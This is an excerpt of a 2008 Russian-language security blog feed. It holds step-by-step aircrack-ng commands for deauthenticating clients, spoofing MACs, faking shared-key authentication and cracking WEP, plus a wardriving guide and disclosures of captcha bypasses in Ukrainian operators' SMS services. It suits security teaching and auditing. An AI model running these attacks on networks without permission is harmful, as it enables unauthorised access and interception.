квадрата.<br />
Сравнение первой точки должно происходить по такому равенству:<br />
<strong>|R-Re| &lt;= COEF_R &amp;&amp; |G-Ge| &lt;= COEF_G &amp;&amp; |B-Be| &lt;= COEF_B</strong><br />
где <strong>R,G,B</strong> - это цветовая схема пикселя тестового изображения,<br />
<strong>Re,Ge,Be</strong> - это цветовая схема пикселя эталонного изображения<br />
<strong>COEF_(R,G,B)</strong> - это коэффициенты потери  , которые возникают в следствие<br />
подачи изображения разного качества</p>
<p>В итоге, если все восемь точек соответствуют равенству - мы<br />
рассматриваем эталонное изображение.</p>
<p>Мы написали класс, для работы с изображениями</p>
<p><a title="http://c.glaive.org.ua/ksocr.html" href="http://c.glaive.org.ua/ksocr.html" target="_blank">http://c.glaive.org.ua/ksocr.html</a></p>
<h5>Администрация сайта была оповещена по электронной почте о найденной уязвимости. Но в течении двух недель мы не дождались ответа и уязвимость до сих пор остаётся рабочей.</h5>
<p>В скорем времени ожидайте подробный анализ уязвимостей связанных с распознаванием каптч, а также обзор методов защиты веб-приложений от этих уязвимостей.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/23gSwQ1S2ls" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/vulnerability/227/kyivstarsms/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/vulnerability/227/kyivstarsms/</feedburner:origLink></item>
		<item>
		<title>Атаки на беспроводные сети. Часть 1</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/bAOP9OQKV6E/</link>
		<comments>http://glaive.org.ua/articles/231/wireless-atacks/#comments</comments>
		<pubDate>Sun, 28 Sep 2008 12:23:08 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[Articles]]></category>

		<category><![CDATA[Projects]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[Wardriving]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=231</guid>
		<description><![CDATA[В прошлой статье о беспроводных сетях мы рассмотрели первый этап - сбор информации, или wardriving. Сейчас же, продемонстрируем несколько способов получения несанкционированного доступа к беспроводным сетям, а также рекомендации по защите от них. 
Сначала перечислим варианты защиты, которые могут быть использованы на точке доступа для ограждения сети от чужих пользователей:

SSID Cloaking - скрытие имени сети. [...]]]></description>
			<content:encoded><![CDATA[<p>В прошлой статье о беспроводных сетях мы рассмотрели первый этап - сбор информации, или wardriving. Сейчас же, продемонстрируем несколько способов получения несанкционированного доступа к беспроводным сетям, а также рекомендации по защите от них. <span id="more-231"></span></p>
<p>Сначала перечислим варианты защиты, которые могут быть использованы на точке доступа для ограждения сети от чужих пользователей:</p>
<ol>
<li>SSID Cloaking - скрытие имени сети. Доступ разрешается только клиентам, которые знают это имя.</li>
<li>MAC Filtering - фильтрация по MAC адресам. Доступ разрешается только клиентам, адреса сетевых адаптеров которых записаны в точке доступа.</li>
<li>Shared key Authentication - аутентификация с общим ключом. Доступ разрешается лишь тем клиентам, которые прошли проверку, используя общий ключ.</li>
</ol>
<p>Важно отметить, что эти методы не обеспечивают конфиденциальности данных, передаваемых по сети, они просто ограничивают доступ к сети. То есть, даже если все эти средства включены на точке доступа, злоумышленник сможет, включив свой беспроводной адаптер в &#8220;monitor mode&#8221;, слушать эфир и вылавливать всю передаваемую информацию. Следующие методы криптографически защищают данные:</p>
<ol>
<li>WEP - статистически самый используемый метод защиты беспроводной сети. Предоставляет шифрование всех передаваемых по сети данных. Аутентификации, как таковой не имеет -  если вы не знаете ключа, вы не сможете расшифровать данные. Недостаток этого метода - очень слабый алгоритм, ключ взламывается злоумышленником менее чем за 5 минут.</li>
<li>WPA и WPA2 Pre-Shared Key - сильная система аутентификации и шифрования данных. Доступ производится через общий ключ. Уровень защиты равен сложности общего ключа, так как система подвержена brute force атакам.</li>
<li>WPA и WPA2 Enterprise - вариант предыдущей системы, но для подтверждения личности используеться внешний аутентификатор 802.1x EAP, что позволяет использовать сертификаты, смарт карты и т.д.</li>
</ol>
<p>Сегодня мы рассмотрим обход первых четырез систем защиты. Основной инструмент для подобных манипуляций - программный пакет <a title="Aircrack-ng" href="http://aircrack-ng.org/doku.php" target="_blank">Aircrack-ng suite</a>. Мы рекомендуем использовать ОС Linux, так как этот пакет более развит в Linux версии, и что более важно - подходящие драйверы, позволяющие атаковать беспроводные сети, более широко представлены   под Linux (На Windows платформах поддерживаются только адаптеры компании CACE - Airpcap). Подробные инструкции по установке правильных драйверов и самого Aircrack-ng вы найдете <a title="Driver install manual" href="http://aircrack-ng.org/doku.php?id=install_drivers&amp;DokuWiki=b80244512482d657f82d5161352cd106" target="_blank">здесь</a>. Теперь приступим к самому процессу.</p>
<p>Для удобства в дальнейшем будем использовать такие обозначения:</p>
<p>00:aa:aa:aa:aa:aa - MAC адрес точки доступа</p>
<p>00:cc:cc:cc:cc:cc - MAC адрес подключенного к этой точке клиента</p>
<p>00:ff:ff:ff:ff:ff - MAC адрес нашего адаптера</p>
<p>wlan0 - имя нашего беспроводного интерфейса</p>
<h3>1.Обход SSID Cloaking</h3>
<p>При подключении к точке доступа, на которой активировано скрытие имени, клиент всегда отправит это имя. Поэтому нам достаточно дождаться одного клиента и все. Для этого запускаем</p>
<p><em>airodump-ng wlan0 -c &lt;канал, на котором находится точка доступа&gt;</em></p>
<p style="text-align: center"><em><a href="http://glaive.org.ua/wp-content/uploads/2008/09/ssid-cloak1.jpg"><img class="size-medium wp-image-243 aligncenter" title="ssid-cloak1" src="http://glaive.org.ua/wp-content/uploads/2008/09/ssid-cloak1.jpg" alt="" width="500" height="158" /></a></em></p>
<p>и если в крайней колонке вы видите &lt;Length:X&gt;, где Х - некое число, то эта сеть скрывает свое имя. Далее нужно подождать немного, пока кто-то подключиться, и тогда значение в колонке изменится на имя сети автоматически. Либо, если долго не удается ничего словить, то можно запустить деаутентификацию командой</p>
<p><em>aireplay-ng wlan0 -0 100 -b 00:aa:aa:aa:aa:aa</em>, где 100 - количество деаутентификаций клиентов</p>
<p style="text-align: center;"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/deauth-all.png"><img class="size-medium wp-image-248 aligncenter" title="deauth-all" src="http://glaive.org.ua/wp-content/uploads/2008/09/deauth-all.png" alt="" width="519" height="176" /></a></p>
<p>Эта операция начнет рассылать пакеты , приказывающие клиентам, подключенным к точке доступа, отключиться от нее. Они отключатся и через несколько секунд начнут подключаться вновь, отсылая в запросе на подключение имя сети. Соответственно airodump-ng его сразу покажет. Для большей эффективности деаутентификации лучше атаковать конкретного подключенного клиента</p>
<p><em>aireplay-ng wlan0 -0 100 -b 00:aa:aa:aa:aa:aa -с 00:сс:сс:сс:сс:сс</em></p>
<p>Также для целей раскрытия имени сети можно использовать kismet. Эта программа автоматически выдает имя сети при подключении к ней клиента.</p>
<h3>2.Обход  MAC Filtering</h3>
<p>Для подключения к точке доступа, которая фильтрует пользователей по MAC адресу их адаптера, необходимо знать лишь MAC адрес уже подключенного клиента. Зная адрес, в ОС Linux выполните</p>
<p><em>ifconfig wlan0 down</em></p>
<p><em>ifconfig wlan0 hw ether 00:cc:cc:cc:cc:cc</em></p>
<p><em>ifconfig wlan0 up</em></p>
<p>либо для OC Windows, воспользуйтесь утилитой MAC changer. Далее необходимо дождаться пока</p>
<p>легитимный клиент отключится, и тогда подключиться, либо использовать атаку деаутентификации на легитимного клиента.</p>
<h3>3.Обход Shared Key Authentication</h3>
<p>Если вы пытаетесь проделать фальшивую аутентификацию командой</p>
<p><em>aireplay-ng wlan0 -1 4000  -a 00:aa:aa:aa:aa:aa</em></p>
<p>и вместо сообщения об успехе получаете</p>
<p>Sending Authentication Request<br />
AP rejects open-system authentication<br />
Please specify a PRGA-file (-y),</p>
<p>то необходимо получить екземпляр аутентификации с общим ключом. Программа airodump-ng это умеет. Запускаем её и ожидаем, пока поле AUTH для выбранной сети не станет равно SKA. Это значит, что программа словила аутентификацию и сохранила ее в файл с именем sharedkey-*.xor . Далее выполняем</p>
<p><em>aireplay-ng -1   4000 -e  &lt;имя сети&gt; -y sharedkey-&lt;ваш файл&gt;.xor -a  00:aa:aa:aa:aa:aa -h  00:ff:ff:ff:ff:ff wlan0 </em></p>
<p>и вы аутентифицируетесь. Если же долго не появляется SKA в airodump-ng, то можно, как и в случае с раскрытием имени, деаутентифицировать существующего клиента.</p>
<h3>4. Взлом Wep ключа</h3>
<p>Алгоритм шифрования используемый WEP еще в начале этого века был взломан, и после этого уже несколько раз в нём находились еще большие уязвимости, позволяющие восстанавливать ключ шифрования еще быстрее. Первая программа, осуществляющая взлом WEP ключа, называлась airsnort и могла это сделать, словив 8-10 миллионов пакетов. Позже, aircrack-ng это позволяла сделать в 10 раз быстрее. А в 2005 году с приходом aircrack-ptw необходимое количество пакетов уменьшилось до 20-80 тысяч, в зависимости от длины ключа.</p>
<p>Для того, чтобы не ждать, пока адаптер словит 80 000 пакетов, мы будем эти пакеты генерировать сами. И самый лучший для этой цели пакет - ARP. Его можна добыть несколькими способами. Но начнем мы с фальшивой аутентификации, без которой точка доступа будет просто игнорировать наши отправляемые пакеты.</p>
<p><em>aireplay-ng wlan0 -1 4000  -a 00:aa:aa:aa:aa:aa</em></p>
<p style="text-align: center;"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/auth.png"><img class="aligncenter size-medium wp-image-250" title="auth" src="http://glaive.org.ua/wp-content/uploads/2008/09/auth.png" alt="" width="506" height="153" /></a></p>
<p>И запускаем Airodump-ng , чтоб сохранять пакеты</p>
<p><em>airodump-ng wlan0 -c 6 -w save</em> , где 6 - канал сети, save - сохранение</p>
<p>Далее самый простой способ:</p>
<p><em>aireplay-ng wlan0 -3 -a 00:aa:aa:aa:aa:aa</em></p>
<p>В этом случае адаптер ловит пакеты и ожидает ARP пакеты. Когда же он появится программа, автоматически начинает его ретранслировать, генерируя новые пакеты, необходимые нам для взлома ключа. После этого запускаете программу:</p>
<p><em>aircrack-ng save-*.cap</em></p>
<p style="text-align: center;"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/aircrack.png"><img class="aligncenter size-medium wp-image-251" title="aircrack" src="http://glaive.org.ua/wp-content/uploads/2008/09/aircrack.png" alt="" width="474" height="316" /></a></p>
<p>и ждете пока она вам не выдаст ключ сети.</p>
<p>Так же можно самим создать этот ARP пакет. Для этого нам понадобится поток ключа (keystream). Достать его можна двумя способами. Первый - chop-chop атака, более медленная но срабатывает чаще.</p>
<p><em> aireplay-ng wlan0 -4 -b 00:aa:aa:aa:aa:aa</em></p>
<p>Вскоре программа словит пакет и ,если его размер больше 56 байт, можете нажимать &#8216;y&#8217; . Через некоторое время поток будет добыт и сохранен в replay_dec-*.xor . Если же программа выдала ошибку, попробуйте запустить её так:</p>
<p><em>aireplay-ng wlan0 -4 -b 00:aa:aa:aa:aa:aa -h 00:ff:ff:ff:ff:ff</em></p>
<p>И обязательно перед этим запустите фальшивую аутентификацию.</p>
<p>Другой вариант - фрагментационная атака. Она значительно быстрее, но работает не на всех точках доступа.</p>
<p><em>aireplay-ng wlan0 -5 -b 00:aa:aa:aa:aa:aa</em></p>
<p>После успешного выполнения вы также получите файл fragment-*.xor</p>
<p>Далее, имея файл с потоком ключа, мы создаем пакет:</p>
<p><em>packetforge-ng -0 -a 00:aa:aa:aa:aa:aa -h 00:ff:ff:ff:ff:ff -k 255.255.255.255 -l 255.255.255.255 -y &lt;файл с потоком&gt; -w arp</em>, где arp - файл для сохранения пакета.</p>
<p>Теперь мы этот пакет будем постоянно отправлять:</p>
<p><em>aireplay-ng wlan0 -2 -r arp</em></p>
<p>И также, как и в первом варианте, запускаем aircrack-ng и ожидаем вывода ключа сети.</p>
<h3>5.Защита</h3>
<p>Как видите, все эти 4 метода имеют уязвимости и легко обходятся, так что даже комбинация SSID cloaking + Mac filtering  + SKA  +WEP займет у злоумышленника больше времени, но в итоге своего он добьется. Поэтому мы рекомендуем использовать исключительно WPA2 с длинными ключами в случае PSK и надежной системой внешней аутентификации в случае WPA2-Enterprise. Остальные методы не предоставляют достаточного уровня безопасности.</p>
<p>В следующей статье мы рассмотри более экзотические атаки на WEP (caffe-latte, client fragmentation и подключение к сети, не зная wep ключа), а также атаки на WPA и способы защиты от них.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/bAOP9OQKV6E" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/articles/231/wireless-atacks/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/articles/231/wireless-atacks/</feedburner:origLink></item>
		<item>
		<title>Вардрайвинг, сбор информации о беспроводных сетях</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/1tyuO8bhehA/</link>
		<comments>http://glaive.org.ua/articles/192/wardriving-manual/#comments</comments>
		<pubDate>Sun, 14 Sep 2008 19:23:59 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[Articles]]></category>

		<category><![CDATA[Projects]]></category>

		<category><![CDATA[Wardriving]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=192</guid>
		<description><![CDATA[Сбор информации о беспроводных сетях или wardriving (в зависимости от способа передвижения, это может быть и warwalking, и warflying, и, как было продемонстрировано на BlackHat 2008 - warbalooning) занятие очень увлекательное и при этом предоставляющее богатые статистические данные об уровне защищености беспроводных сетей по городу. 
Часть 1.Hardware
Wi-Fi адаптер
В случае анализа небольшой територии (дом или квартал) [...]]]></description>
			<content:encoded><![CDATA[<p>Сбор информации о беспроводных сетях или wardriving (в зависимости от способа передвижения, это может быть и warwalking, и warflying, и, как было продемонстрировано на BlackHat 2008 - <a href="http://www.networkworld.com/news/2008/081008-covert-operation-floats-network-sniffing.html?hpg1=bn">warbalooning</a>) занятие очень увлекательное и при этом предоставляющее богатые статистические данные об уровне защищености беспроводных сетей по городу. <span id="more-192"></span></p>
<h2>Часть 1.Hardware</h2>
<h3><strong>Wi-Fi адаптер</strong></h3>
<p>В случае анализа небольшой територии (дом или квартал) может хватить и мощности встроенной в ноутбук или кпк адаптера и антенны. Но для более серьезного исследования мы б рекомендовали USB или PCMCIA адаптер с разьемом для внешней антенны. При выборе адаптера очень важна модель его чипсета , о чем будет подробнее рассказано в следующем разделе. Приводим ниже некоторые из наиболее популярных адаптеров:</p>
<p><span style="text-decoration: underline;"><strong>Alfa networks </strong><strong>AWUS036H</strong></span></p>
<p>Примечатален своей мощностью (500mW), разьемом SMA для антенны и отлично поддерживаемым чипсетом, USB</p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_204" class="wp-caption aligncenter" style="width: 103px;">
<dt class="wp-caption-dt"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/awuso36h.jpg"><img class="size-medium wp-image-204" title="awuso36h" src="http://glaive.org.ua/wp-content/uploads/2008/09/awuso36h-300x300.jpg" alt="Alfa networks awuso36h" width="93" height="93" /></a></dt>
</dl>
</div>
<p><strong><span style="text-decoration: underline;">Ubiquiti SRC</span></strong></p>
<p>Адаптер также высокой мощности (300mW), разьем MMCX для антенны, отлично поддерживаемым чипсетом, PCMCIA</p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_205" class="wp-caption aligncenter" style="width: 127px;">
<dt class="wp-caption-dt"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/ubiquiti-srccw.jpg"><img class="size-medium wp-image-205" src="http://glaive.org.ua/wp-content/uploads/2008/09/ubiquiti-srccw-300x265.jpg" alt="ubiquitu-src" width="117" height="103" /></a></dt>
</dl>
</div>
<p><span style="text-decoration: underline;"><strong>Linksys </strong><strong>WUSB54GC</strong></span></p>
<p>Менее мощный адаптер без разьема для антенны. Основные преимущества - поддерживаемый чипсет и возможность его свободного приобретения в Украине.</p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_206" class="wp-caption aligncenter" style="width: 111px;">
<dt class="wp-caption-dt"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/wusb54gc-eu.jpg"><img class="size-medium wp-image-206" src="http://glaive.org.ua/wp-content/uploads/2008/09/wusb54gc-eu-300x265.jpg" alt="wusb54gc" width="101" height="88" /></a></dt>
</dl>
</div>
<p>Полный список карт, которые подходят для подобного рода исследований вы найдете <a href="http://www.aircrack-ng.org/doku.php?id=compatibility_drivers">здесь</a>.</p>
<h3>Антенна</h3>
<p>Если вы решили пользоваться картой с разьемом для подключения внешней антенны, то вам нужна будет либо направленная, либо всенаправленная антенна. Первые имеют большую дальность, при равных коефициентах усиления, но значительно меньший угол охвата. Направленные антенны лучше использовать для сканирования ограниченной територии, либо оценки безопасности конкретных точек доступа. Второй вид лучше подходит именно для wardriving, для сбора данных на большой територии. Для нормального охвата вполне достаточно всенапраленной антенны с усилением 7-9 dbi. Обратите внимание на разьем подключения антенны, чтоб он соответствовал разьему на адаптере. Как правило, это SMA разьем, он на большинстве карт с внешними антеннами. Иногда встречаються более редкие MMCX или N-type. Производитель не имеет особого значения, главное характристики самой антенны.</p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_198" class="wp-caption aligncenter" style="width: 310px;">
<dt class="wp-caption-dt"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/ag_wlan_directional_antenna_low_res.jpg"><img class="size-medium wp-image-198" title="ag_wlan_directional_antenna_low_res" src="http://glaive.org.ua/wp-content/uploads/2008/09/ag_wlan_directional_antenna_low_res-300x216.jpg" alt="directional antenna" width="237" height="170" /></a></dt>
</dl>
</div>
<h3><strong>GPS</strong></h3>
<p>Для того чтоб при сборе информации сохранялись не только параметры точки доступа, но и её координаты, вам понадобиться gps. Причем это может быть как bluetooth или usb/serial gps, так и обычный gps-навигатор  подключенный к компьютеру кабелем либо смартфон с встроенным gps. Главное чтобы это устройство могло передавать данные по протоколу nmea (или в случае отдельных gps навигаторов - проприетарному протоколу garmin).</p>
<h2>Часть 2.Software</h2>
<p>Как нам кажеться, значительно удобнее проводить сбор информации о беспроводных сетях на ОС Linux. Далее описаные действия проводились на Ubuntu linux 8.04 , но с небольшими изменениями могут быть повторены и на любом другом Linux&#8217;е.</p>
<h3>Драйверы</h3>
<p>Для wardriving вам понадобиться драйвер который поддерживает так называемый &#8220;monitor mode&#8221;, режим в котором адаптер будет принимать все пакеты, а не только те которые ему предназначены. В некоторых драйверах этот режим предусмотрен производителем, некоторые придеться пропатчить и перекомпилировать. Наиболее полная информация о драйверах находиться <a href="http://aircrack-ng.org/doku.php?id=install_drivers&amp;DokuWiki=5e67f17a785c4241dabe9a56a825abca">здесь</a>. Безболезненее всего устанавливаються и работают, по нашему мнению, драйверы для чипсетов Ralink rt2500, Realtek 8187 и Atheros.</p>
<p>Для работы и с gps, необходимо чтобы он был установлен как serial device и был закреплен как, например /dev/ttyS0. После этого запустите программу gpsd (<em>apt-get install gpsd</em>)</p>
<p><em>gpsd /dev/ttyS0</em></p>
<p>Если вы используете bluetooth gps добавьте ключ -b</p>
<p><em>gpsd /dev/ttyS0 -b</em></p>
<h3>Программы</h3>
<p>Основные 2 программы для wardriving - это Kismet и Aircrack-ng suite. Рассмотрим вначале первую.</p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_201" class="wp-caption aligncenter" style="width: 310px;">
<dt class="wp-caption-dt"><a href="http://glaive.org.ua/wp-content/uploads/2008/09/kismet1.png"><img class="size-medium wp-image-201" title="Kismet" src="http://glaive.org.ua/wp-content/uploads/2008/09/kismet1-300x210.png" alt="kismet" width="300" height="210" /></a></dt>
</dl>
</div>
<p>Kismet есть во всех репозитариях, так что достаточно выполнить команду <em>apt-get install kismet</em> (или <em>yum install kismet</em> или <em>emerge kismet</em>, соответственно для Debian(Ubuntu),Fedora и Gentoo систем), а после этого открыть конфигурационный файл /etc/kismet/kismet.conf и изменить в нем строку</p>
<p><em>source=&lt;драйвер, например rtl8187&gt;,&lt;интерфейс, например wlan0&gt;,&lt;просто обозначения этого источника, например first interface&gt;</em> (без скобок)</p>
<p><em>gps=true</em> , если на вашей системе запущен gpsd, подключенный к gps адаптеру</p>
<p>Этого будет достаточно чтобы kismet был готов к работе. Осталось только его запустить командой <em>kismet</em>. После этого вы увидите постепенно наполняющийся список точек доступа. Во время этого программа будет записывать всю информацию в файлы нескольких форматов - .csv, со списком и параметрами всех точек, .gps - координаты точек и xml - куда записуется и первое и второе.</p>
<p>Эти файлы дальше будет преобразованы в .kml для просмотра в Google Earth и Google Maps. Преобразовывать можна одним из многочисленным скриптов для этого  - <a href="http://www.niquille.com/kismet-earth">Kismet Earth</a>, <a href="http://e-axe.mytty.org/kisgearth">KisGearth</a>. Также, если у вас собрались несколько файлов .csv/.gps/.xml то их можна обьединить в один программой merge из комплекта <a href="http://sourceforge.net/projects/kismettoolsuite">Kismet tools suite</a>.</p>
<p>О второй программе aircrack-ng suite мы расскажем в следующей статье о безопасности беспроводных сетей, ведь она меньше предназначена для wardriving и больше для аудита беспроводный сетей.</p>
<h2>Часть 3.Защита</h2>
<p>Скрыть существование своей сети от случайного wardriver&#8217;а довольно сложно. В городских условиях волны точки доступа, отбиваясь от стен, могут попадать в совершенно неожиданные места, поетому нельзя недооценивать шаг планирования и размещения точки и расположить её чтобы масимально покрыть необходимую територию и ограничить уход волн в ненужных направлениях. Некоторые точки доступа позволяют регулировать мощность сигнала, что является инструментов для контроля распространения сигнала. При необходимости 100% невидимости беспроводной сети можем лишь рекомендовать пользоваться ethernet&#8217;ом или полность екранировать помещение с точкой доступа (например <a href="http://www.zdnet.com.au/news/security/soa/Wallpaper-designed-to-protect-Wi-Fi-networks/0,130061744,139151161,00.htm" target="_blank">вот так</a>). И последнее - сокрытие имени точки доступа (ESSID cloaking) никоим образом вашу сеть не спрячет, её можна вычислить по данным которые отсылают ей клиенты, а большинство снифферов делают это автоматически, поэтому лучшей вашей защитой будет высокий уровень шифрования и аутентификации (WPA2-PSK с длинным ключом или WPA2-enterprise с внешним сервером аутентификации) и тогда даже если вашу сеть обнаружат, злоумышленники не смогут в нее проникнут.</p>
<p>Подробнее об атаках на беспроводные сети и возможности их предотвращения читайте в следующей статье о безопасности беспроводных сетей.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/1tyuO8bhehA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/articles/192/wardriving-manual/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/articles/192/wardriving-manual/</feedburner:origLink></item>
		<item>
		<title>Обход каптчи на сайте украинского Билайна</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/16JCU86_csg/</link>
		<comments>http://glaive.org.ua/ocr/185/ocr-beeline/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 10:15:14 +0000</pubDate>
		<dc:creator>Rubalko Dmitriy</dc:creator>
		
		<category><![CDATA[OCR]]></category>

		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=185</guid>
		<description><![CDATA[На сайте украинского оператора мобильной связи &#8220;Билайн&#8221; была найдена уязвимость в сервисе отправки коротких текстовых сообщений.
Для защиты от спам-ботов в сервисе используется реализация теста Тьюринга. Нами была найдена уязвимость в этом тесте.

Суть уязвимости заключается в том, что используя специальный алгоритм можно составить RGB-карту эталонных цифр с целью последующего эталонного сравнения. Таким образом,  злоумышленник может организовать [...]]]></description>
			<content:encoded><![CDATA[<p>На сайте украинского оператора мобильной связи &#8220;Билайн&#8221; была найдена уязвимость в сервисе отправки коротких текстовых сообщений.</p>
<p>Для защиты от спам-ботов в сервисе используется реализация теста Тьюринга. Нами была найдена уязвимость в этом тесте.</p>
<p><span id="more-185"></span></p>
<p>Суть уязвимости заключается в том, что используя специальный алгоритм можно составить RGB-карту эталонных цифр с целью последующего эталонного сравнения. Таким образом,  злоумышленник может организовать спам-рассылку.</p>
<p>Нами был написан класс, который реализует оптическое распознавание растровой графики с сайта компании Билайн.</p>
<p><a href="http://c.glaive.org.ua/code/11" target="_blank">http://c.glaive.org.ua/code/11</a></p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/16JCU86_csg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/ocr/185/ocr-beeline/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/ocr/185/ocr-beeline/</feedburner:origLink></item>
	</channel>
</rss>
